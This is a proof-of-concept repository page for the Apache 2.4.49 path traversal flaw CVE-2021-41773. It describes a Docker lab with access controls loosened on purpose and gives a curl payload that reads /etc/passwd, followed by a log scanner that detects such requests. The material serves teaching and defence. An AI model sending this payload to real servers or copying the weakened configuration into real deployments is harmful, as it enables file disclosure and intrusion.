CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Source
Associated Vulnerability
Title: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
Description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.
Readme
# CVE-2021-41773 – Apache Path Traversal Report

---
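## Summary
- A vulnerability found in Apache HTTP Server 2.4.49 that, depending on the web server configuration, can expose sensitive files on the system through a path traversal attack
- Path Traversal: an attacker uses a path containing ../ to access files outside the web root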

---
## Information
- **Vulnerability name**: CVE-2021-41773
- **Affected version**: Apache HTTP Server 2.4.49
- **Vulnerability type**: Path Traversal
- **Official patch**: patched in 2.4.50 and later

---
## Lab Environment Setup
- Base image: 'httpd:2.4.49' (DockerHub)
- Container launch method: Dockerfile + docker-compose.yml
- Port: 8080 → mapped to port 80 in the container
- Apache configuration change: modified to 'Require all granted' (makes path traversal possible)

---
## Running the Environment
- git clone https://github.com/JIYUN02/cve-2021-41773.git
- cd cve-2021-41773
- docker-compose up --build

---
## Vulnerability PoC
- curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

---
## Detailed Steps
1. Set up the directory for the assignment
<img width="560" alt="image" src="https://github.com/user-attachments/assets/49645e97-75fc-4210-9d03-17f814e22138" />
<img width="561" alt="image" src="https://github.com/user-attachments/assets/a386852c-08f6-4d40-85e0-dfc061b53c23" />

2. Write the Dockerfile
<img width="576" alt="image" src="https://github.com/user-attachments/assets/9fa8e776-ed89-434a-a935-cd99bfc77dbb" />

-> Base Image: httpd:2.4.49 (the version containing the vulnerability)

-> sed -i 's/Require all denied/Require all granted/g' : allows path traversal and external access

3. docker-compose.yml
<img width="219" alt="image" src="https://github.com/user-attachments/assets/468f1203-30a4-4834-8823-e45b29a42bbf" />

-> Defines the Apache service

-> Maps port 8080 to port 80 in the container

4. Run docker
<img width="559" alt="image" src="https://github.com/user-attachments/assets/39e2b358-01e8-4570-9c3b-6d248bff3420" />

5. Run the PoC
<img width="561" alt="image" src="https://github.com/user-attachments/assets/c7f988d4-263f-49f6-9175-7b58ca2a3a5a" />

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd holds sensitive information; .%2e is the URL-encoded form of .., which moves to the parent directory

-> The manipulated path makes the server access /etc/passwd and return its contents

6. Result
<img width="566" alt="image" src="https://github.com/user-attachments/assets/3e2bf503-25b7-4ec0-ab8c-a17d069c2397" />

-> As the image above shows, the sensitive directory is accessible
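
A defender-side check for the request shown in step 5, as an added example that is not part of the original README: it scans access-log lines for URL paths whose `..` segments appear only after percent-decoding and reports whether the server answered with a 2xx status. The log lines are constructed samples, the function names are hypothetical, and the bounded repeated decoding generalizes beyond the single `.%2e` form shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format), not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 45
203.0.113.9 - - [06/Oct/2021:10:00:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1024
203.0.113.9 - - [06/Oct/2021:10:00:09 +0000] "GET /icons/%2E%2E/%2E%2E/etc/hosts HTTP/1.1" 403 199
198.51.100.4 - - [06/Oct/2021:10:01:00 +0000] "GET /docs/v1.2..3/notes.txt HTTP/1.1" 200 300
198.51.100.4 - - [06/Oct/2021:10:01:02 +0000] "GET /search?q=..%2F HTTP/1.1" 200 512
"""

# client, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encodings are unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def has_encoded_traversal(target):
    """True when decoding the URL path reveals '..' segments the raw path did not show."""
    raw_path = target.split("?", 1)[0]          # ignore the query string
    raw_segments = raw_path.split("/")
    decoded_segments = decode_fully(raw_path).split("/")
    return decoded_segments.count("..") > raw_segments.count("..")

def scan(log_text):
    """Return (client, target, status, served) for each request hiding '..' behind encoding."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and has_encoded_traversal(m.group(3)):
            client, _method, target, status = m.groups()
            # A 2xx answer means the server returned content for the traversal path.
            hits.append((client, target, int(status), status.startswith("2")))
    return hits

if __name__ == "__main__":
    for client, target, status, served in scan(SAMPLE_LOG):
        print(f"{'SERVED' if served else 'blocked'} {status} {client} {target}")
```

A hit with a 2xx status is the case to triage first, since it means the server answered the traversal request with content rather than rejecting it.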

---
## Repository URL accessible via fork
https://github.com/JIYUN02/cve-2021-41773

-> Commit history exists
  

File Snapshot

[4.0K] /data/pocs/d76435df44e64ece9f405e7f22e3db1c1d8b2c83
├── [  76] docker-compose.yml
├── [ 226] Dockerfile
└── [2.8K] README.md

0 directories, 3 files